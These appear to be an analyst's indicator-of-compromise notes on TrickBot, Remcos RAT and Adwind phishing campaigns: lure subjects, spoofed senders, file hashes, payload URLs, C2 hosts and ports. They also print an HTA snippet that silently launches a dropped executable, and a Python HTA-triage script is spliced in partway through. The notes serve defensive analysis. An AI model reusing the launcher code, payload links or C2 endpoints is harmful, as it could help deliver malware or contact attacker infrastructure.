TRICKBOT
========

SUBJECTS OBSERVED
Case 89310
Case 18621
Case 92644
Document 42048
Info 50741
Information Co-VID 2019 US-21779
Information Co-VID 2019 US-25575
Information Co-VID 2019 US-26131
Information Co-VID 2019 US-29315
Inportant Certificate 70904
Inportant Certificate 76315
Inportant Certificate 85845
Notice 62959
Notice 75037
Notice 12183
Notice 24902
Notice 89864
Price list 20655
Price list 21571
Pricelist 67723

SENDERS OBSERVED
XLS FILE HASHES
396342d0f56c2bd48090928533b84811
4b27434ebfecbe10791cbff4a3f9d5ae
5992a0512b07dc649966593c5fa83615
7e3d6b2e5c80a362a26c5c6b2f7be699

TRICKBOT PAYLOAD
https://dichthuatsnu.com/goodweb/pwofiles.php
(404 for me)

REMCOS RAT
==========

SUBJECTS OBSERVED
UPS - Pending delivery

SENDERS OBSERVED
customer@ups.com

ISO FILE HASH
UPS FILE.iso
234dad41dcc5a322f52389d9240f8a17

EXE FILE HASH
ReadMe.exe
dda0e966b7ac2212f5198148f38671e8

PAYLOAD URL
https://drive.google.com/u/0/uc?id=1lVL8gvfw2wnlmPUClhC25NoOYP9k-g43&export=download
https://doc-0s-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ra0dot23h8r8t95f4j3399di0c634nqe/1588353900000/01481671314862437446/*/1lVL8gvfw2wnlmPUClhC25NoOYP9k-g43?e=download

FOLLOW-UP DOWNLOAD
Cqsl
42274f35bf8af5c7e1375637cc645067

ADDITIONAL DOWNLOADS
Cqslset.exe
dda0e966b7ac2212f5198148f38671e8
Cqsl.hta
578bf01e06d2f3c533b704ea98c02591

HTA FILE CONTENTS
    <script>
    var shell = new ActiveXObject("Shell.Application");
    shell.ShellExecute("C:\\Users\\analyst\\AppData\\Local\\Cqsl\\Cqslset.exe","","","open","0");
    window.close();
    </script>
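As an added defender-side example (not part of the analyst's note), a small Python triage that flags HTA launchers like the one above: it looks for the Shell.Application object plus a ShellExecute call, extracts the target path, and scores a hidden launch of an executable from a user-writable directory. The directory list and the scoring threshold are my assumptions; the inputs are the HTA from this note and a constructed benign one for contrast.

```python
import re

# The HTA body from the note above, used as the first test input.
SAMPLE_HTA = r'''<script>
var shell = new ActiveXObject("Shell.Application");
shell.ShellExecute("C:\\Users\\analyst\\AppData\\Local\\Cqsl\\Cqslset.exe","","","open","0");
window.close();
</script>'''

# A benign-looking HTA, constructed for contrast: starts a System32 tool with a visible window.
BENIGN_HTA = r'''<script>
var shell = new ActiveXObject("Shell.Application");
shell.ShellExecute("C:\\Windows\\System32\\notepad.exe","","","open","1");
</script>'''

# Directories a normal user can write to (assumed list); launching an .exe from
# one of these via an HTA is a common dropper pattern.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")

# ShellExecute(file, args, dir, verb, show): capture the file and the show flag.
SHELLEXEC_RE = re.compile(
    r'ShellExecute\s*\(\s*"(?P<target>[^"]*)"'
    r'\s*,\s*"[^"]*"\s*,\s*"[^"]*"\s*,\s*"[^"]*"\s*,\s*"(?P<show>[^"]*)"',
    re.IGNORECASE)
SHELLAPP_RE = re.compile(r'ActiveXObject\s*\(\s*"Shell\.Application"', re.IGNORECASE)


def triage_hta(hta_text: str) -> dict:
    """Return the launcher indicators found in one HTA body plus a simple verdict."""
    findings = {
        "uses_shell_application": bool(SHELLAPP_RE.search(hta_text)),
        "closes_window": "window.close()" in hta_text,
        "targets": [],
        "hidden_launch": False,
        "user_writable_target": False,
    }
    for m in SHELLEXEC_RE.finditer(hta_text):
        # Undo JScript string escaping so the path reads as Windows sees it.
        target = m.group("target").replace("\\\\", "\\")
        findings["targets"].append(target)
        if m.group("show").strip() == "0":   # nShowCmd 0 = SW_HIDE, no window for the user
            findings["hidden_launch"] = True
        if any(d in target.lower() for d in USER_WRITABLE):
            findings["user_writable_target"] = True
    flags = ("uses_shell_application", "closes_window", "hidden_launch", "user_writable_target")
    findings["score"] = sum(findings[k] for k in flags)
    findings["verdict"] = "suspicious" if findings["score"] >= 3 else "low"   # assumed threshold
    return findings
```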
ADDITIONAL FILES DROPPED/DOWNLOADED
I also found the following two files that were created and added to C:\Windows\system32
fodhelper.exe
7215c73ec1aae35b9e4b1f22c811f85c
propsys.dll
487766bf2f0add388cb123d1ef7ece46

REMCOS C2
u864246.nvpn.so:2404
C:\Program Files (x86)\Internet Explorer\ieinstal.exe Connects to "185.140.53.21" on port 2404 (TCP).

ADDITIONAL FILES
The following files were created:
C:\Windows\System32\fodhelper.exe
C:\Windows\System32\propsys.dll
C:\Users\analyst\AppData\Local\Cqsl\Cqsl.hta
C:\Users\analyst\AppData\Local\Cqsl\Cqslset.exe
C:\Users\analyst\AppData\Local\Cqsl\Fuck

ADWIND
======

SUBJECTS OBSERVED
Congratulations!!! You have been awarded $500 Amazon gift card

SENDERS OBSERVED
noreply@amazon.com

FILE ATTACHMENT HASHES
Amazon Gift card.zip
6dda0276b4afd1e6be26a7690a8add2f
Amazon Gift card.jar
1f88741dbf450bde1deafb256b6a1495

ADWIND C2
Queried DNS: praisesalways.ddns.net
No reply
Also saw TCP traffic to:
79.134.225.111:1010